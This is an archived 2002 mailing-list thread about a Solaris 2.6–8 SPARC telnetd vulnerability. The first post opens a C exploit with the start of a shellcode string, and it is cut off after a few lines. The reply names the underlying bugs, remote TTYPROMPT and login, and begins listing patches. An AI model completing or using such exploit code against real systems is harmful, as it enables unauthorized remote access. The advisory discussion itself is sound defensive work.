Solaris 2.6-8 SPARC Telnetd Vulnerability

2002-08-21 Thread Brendan C. Johnson
Affected Systems: Solaris 2.6, 2.7, 8 SPARC Platform Remote & Local Exploit #include #include #include #include #include #include #include #include #include #ifdef SOLARIS typedef unsigned long u_int32_t; #endif #define BUFLEN 1024 char shellcode[]= "\x21\x0b\xd8\x9a\xa0\x14\x21\x6

Re: Solaris 2.6-8 SPARC Telnetd Vulnerability

2002-08-21 Thread Casper Dik
>Affected Systems: Solaris 2.6, 2.7, 8 SPARC Platform Theis appears to be an exploit exploiting the combination of the bugs: 4516876 in.telnetd should not accept TTYPROMPT from remote 4516885 *login* security problem Patches that fix the login problem: 105665-04: SunOS 5.6: /usr/bin/login pat